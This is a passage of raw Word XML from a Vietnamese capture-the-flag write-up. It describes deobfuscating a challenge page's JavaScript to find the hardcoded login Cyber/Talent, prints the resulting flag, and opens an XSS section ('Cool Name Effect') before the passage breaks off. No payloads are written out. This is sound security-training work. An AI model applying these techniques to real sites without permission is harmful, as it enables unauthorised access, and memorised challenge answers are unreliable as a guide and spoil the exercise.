    <w:bookmarkStart w:id="5" w:name="_heading=h.vb1a2h4cl4zo" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="5" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_0"/>
        <w:id w:val="140158536"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="1A5EFEF5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="360" w:after="80" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Iam Legend - data, information</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4967C203" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện kiểm tra các trường thông tin của trang và sử dụng node để lấy flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8AD218"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bookmarkStart w:id="6" w:name="_heading=h.a1nee51c8cap" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="6" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_1"/>
        <w:id w:val="1973088903"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="64AAB6DC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="360" w:after="80" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Tài nguyên:</w:t>
          </w:r>
          <w:hyperlink r:id="rId20">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="212120"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink r:id="rId21">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:color w:val="1155CC"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>http://deobfuscatejavascript.com/</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_2"/>
        <w:id w:val="-1816866354"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="04361574" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Bước 1: Xem trang web</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="7" w:name="_heading=h.iy7ui1rhjj31" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="7" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_3"/>
        <w:id w:val="1075704256"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="29E1BC76" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="0" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Tiến hành vào website challenge và Inspect trang web, ta thấy được source trang web có 1 đoạn script có nội dung khá lạ như hình bên dưới.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="8" w:name="_heading=h.7t13v6eja625" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="8" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_4"/>
        <w:id w:val="-1208477217"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5407D2FB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Figure 1: Hình ảnh 1 phần đoạn script</w:t>
          </w:r>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="254895A6" wp14:editId="6CA1CFFA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-471</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>133350</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6114105" cy="3073400"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
                <wp:docPr id="224" name="image112.png" descr="Hình ảnh 1 phần đoạn script"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                    <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:nvPicPr>
                        <pic:cNvPr id="0" name="image112.png" descr="Hình ảnh 1 phần đoạn script"/>
                        <pic:cNvPicPr preferRelativeResize="0"/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId22"/>
                        <a:srcRect/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6114105" cy="3073400"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_5"/>
        <w:id w:val="-1110662527"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="4B35D866" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Bước 2: Tìm công cụ giải mã</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="9" w:name="_heading=h.c11ndnc0abl7" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="9" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_6"/>
        <w:id w:val="-1812626158"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="6BBBAC80" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Chúng em thử tiến hành tìm công cụ giải mã đoạn script và tìm được trang web</w:t>
          </w:r>
          <w:hyperlink r:id="rId23">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:hyperlink>
          <w:hyperlink r:id="rId24">
            <w:r w:rsidRPr="007913DC">
              <w:rPr>
                <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:color w:val="1155CC"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>http://deobfuscatejavascript.com/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t xml:space="preserve"> và giải mã đoạn script như hình dưới</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="10" w:name="_heading=h.sxboc2w99jse" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="10" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_7"/>
        <w:id w:val="1642156967"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="19D59679" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="center"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            </w:rPr>
            <w:t>Figure 2: Hình ảnh đoạn script</w:t>
          </w:r>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="16B49F63" wp14:editId="2A534C4B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19051</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>114300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6114105" cy="3657600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
                <wp:docPr id="22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5"/>
                        <a:srcRect/>
                        <a:stretch>
                          <a:fillRect/>
                        </a:stretch>
                      </pic:blipFill>
                      <pic:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6114105" cy="3657600"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="11" w:name="_heading=h.k6fa3fqucphb" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="11" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_8"/>
        <w:id w:val="-1873520898"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="31FA700E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="160" w:line="256" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Đoạn code này sẽ trả về 1 chuỗi nào đó, chúng em nghi ngờ đó là flag.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="12" w:name="_heading=h.n89c2s4rg9cl" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="12" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_9"/>
        <w:id w:val="-1481532500"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="6FA9A997" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:before="240" w:after="240" w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
            </w:rPr>
            <w:t>Bước 3: Tìm flag</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="13" w:name="_heading=h.ns44ywyc94r5" w:colFirst="0" w:colLast="0" w:displacedByCustomXml="next"/>
    <w:bookmarkEnd w:id="13" w:displacedByCustomXml="next"/>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
        <w:tag w:val="goog_rdk_10"/>
        <w:id w:val="-2125612431"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="5ADC0442" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="Heading2"/>
            <w:spacing w:line="276" w:lineRule="auto"/>
            <w:ind w:left="0" w:firstLine="0"/>
            <w:jc w:val="both"/>
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
              <w:b w:val="0"/>
              <w:color w:val="212120"/>
            </w:rPr>
            <w:t>Chúng em tiến hành thực thi đoạn script đã được giải mã ở trên và thu được kết quả đoạn code như bên dưới</w:t>
          </w:r>
          <w:r w:rsidRPr="007913DC">
            <w:rPr>
              <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="58A29CFB" wp14:editId="716D2AD0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>19051</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>541427</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6114105" cy="2400300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
                <wp:docPr id="1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6114105" cy="2400300"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln/>
                      </pic:spPr>
                    </pic:pic>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="459C424D"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3: Hình ảnh đoạn code sau khi giải mã</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A85426" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52B0F6EB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với hình ảnh trên, ta thấy rằng đoạn code nhằm mục đích kiểm tra nếu đúng rằng username là Cyber và password là Talent thì sẽ hiển thị thông báo Flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD694A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tiến hành login thử và ta nhận được flag như hình bên dưới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BD2682"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t>Figure 4: Hình ảnh flag challenge 3</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="04106168" wp14:editId="03757F5E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-471</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="114300" distB="114300" distL="114300" distR="114300"/>
            <wp:docPr id="1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6114105" cy="3924300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="287B0EE9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Flag: {J4V4_Scr1Pt_1S_S0_D4MN_FUN}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F7D7A4" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: Chặn các thông tin ở trang sau khi đã code xong</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26185DA3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCEC64" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_heading=h.uoxcv1wz14v4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Cool Name Effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43957851" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cool Name Effect - information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583599E9" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Thực hiện gọi hàm alert để gọi bug </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5E5B5C"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0DE3987D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
